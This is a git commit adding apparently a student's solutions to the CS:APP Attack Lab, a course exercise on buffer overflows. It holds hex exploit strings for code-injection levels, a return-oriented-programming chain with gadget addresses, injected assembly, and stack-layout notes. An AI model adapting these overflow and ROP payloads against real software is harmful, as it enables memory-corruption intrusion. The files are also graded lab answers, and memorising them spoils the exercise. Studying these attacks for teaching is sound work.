chapter 3: reading excercises + attacklab

7 files changed, 78 insertions, 0 deletions

diff --git a/labs/attacklab/solution/ctarget.1.txt b/labs/attacklab/solution/ctarget.1.txt
new file mode 100644
index 0000000..2779c46
--- /dev/null
+++ b/labs/attacklab/solution/ctarget.1.txt
@@ -0,0 +1 @@
+ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de c0 17 40 00 00 00 00 00
diff --git a/labs/attacklab/solution/ctarget.2.txt b/labs/attacklab/solution/ctarget.2.txt
new file mode 100644
index 0000000..fb116d2
--- /dev/null
+++ b/labs/attacklab/solution/ctarget.2.txt
@@ -0,0 +1,2 @@
+bf fa 97 b9 59 68 ec 17 40 00 c3 de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de 78 dc 61 55 00 00 00 00
+
diff --git a/labs/attacklab/solution/ctarget.3.txt b/labs/attacklab/solution/ctarget.3.txt
new file mode 100644
index 0000000..0cdf60c
--- /dev/null
+++ b/labs/attacklab/solution/ctarget.3.txt
@@ -0,0 +1 @@
+48 c7 c7 a8 dc 61 55 68 fa 18 40 00 c3 00 00 00 00 00 00 00 00 00 ad de ef be ad de ef be ad de ef be ad de ef be ad de 78 dc 61 55 00 00 00 00 35 39 62 39 39 37 66 61 00
diff --git a/labs/attacklab/solution/ctarget.4.txt b/labs/attacklab/solution/ctarget.4.txt
new file mode 100644
index 0000000..d322873
--- /dev/null
+++ b/labs/attacklab/solution/ctarget.4.txt
@@ -0,0 +1,9 @@
+ef be ad de ef be ad de     /* rsp - 40 */
+ef be ad de ef be ad de     /* rsp - 32 */
+ef be ad de ef be ad de     /* rsp - 24 */
+ef be ad de ef be ad de     /* rsp - 16 */
+ef be ad de ef be ad de     /* rsp - 8 */
+ab 19 40 00 00 00 00 00     /* return address: call addval_219+4 */
+fa 97 b9 59 00 00 00 00     /* cookie: popped into rax */
+a2 19 40 00 00 00 00 00     /* return address: call addval_273+2 */
+ec 17 40 00 00 00 00 00     /* return address: call touch2 */
diff --git a/labs/attacklab/solution/farm.yaml b/labs/attacklab/solution/farm.yaml
new file mode 100644
index 0000000..d425028
--- /dev/null
+++ b/labs/attacklab/solution/farm.yaml
@@ -0,0 +1,35 @@
+getval_142:
+  3: |
+    nop
+    nop
+    ret
+
+addval_273:
+  2: |
+    movq %rax, %rdi
+    ret
+  3: |
+    movl %eax, %edi
+    ret
+
+addval_219:
+  4: |
+    popq %rax
+    nop
+    ret
+
+# 00 00 00 00 00 40 17 ec     // return address: call touch2
+# 00 00 00 00 00 40 19 a2     // return address: call addval_273+2
+# 00 00 00 00 a8 dc 61 55     // cookie: popped into rax
+# 00 00 00 00 00 40 19 ab     // return address: call addval_219+4
+# ef be ad de ef be ad de     // rsp - 8
+# ef be ad de ef be ad de     // rsp - 16
+# ef be ad de ef be ad de     // rsp - 24
+# ef be ad de ef be ad de     // rsp - 32
+# ef be ad de ef be ad de     // rsp - 40
+
+setval_237:
+
+setval_424:
+
+
diff --git a/labs/attacklab/solution/set_cookie.s b/labs/attacklab/solution/set_cookie.s
new file mode 100644
index 0000000..f11f435
--- /dev/null
+++ b/labs/attacklab/solution/set_cookie.s
@@ -0,0 +1,3 @@
+movq    $0x5561dca8,%rdi
+pushq   $0x00000000004018fa
+ret
diff --git a/labs/attacklab/solution/stack.c b/labs/attacklab/solution/stack.c
new file mode 100644
index 0000000..1c9002f
--- /dev/null
+++ b/labs/attacklab/solution/stack.c
@@ -0,0 +1,27 @@
+// 00 00 00 00 00 00 00 00     // free space: int val
+// 00 00 00 00 00 40 17 c0     // return address: call getbuf
+// ef be ad de ef be ad de     // rsp - 8
+// ef be ad de ef be ad de     // rsp - 16
+// ef be ad de ef be ad de     // rsp - 24
+// ef be ad de ef be ad de     // rsp - 32
+// ef be ad de ef be ad de     // rsp - 40
+
+ef be ad de ef be ad de
+ef be ad de ef be ad de
+ef be ad de ef be ad de
+ef be ad de ef be ad de
+ef be ad de ef be ad de
+40 17 c0 00 00 00 00 00
+
+
+0x5561dc78:     0x17ec6859b997fabf      0xdeadbeefdec30040
+0x5561dc88:     0xdeadbeefdeadbeef      0xdeadbeefdeadbeef
+0x5561dc98:     0xdeadbeefdeadbeef      0x0000000000000000
+
+59 b9 97 fa
+
+006166373939623935
+
+0x5561dc78:     0xdeadbeefdeadbeef      0xdeadbeefdeadbeef
+0x5561dc88:     0xdeadbeefdeadbeef      0x35adbeefdeadbeef
+0x5561dc98:     0x0061663739396239      0x000000005561dc78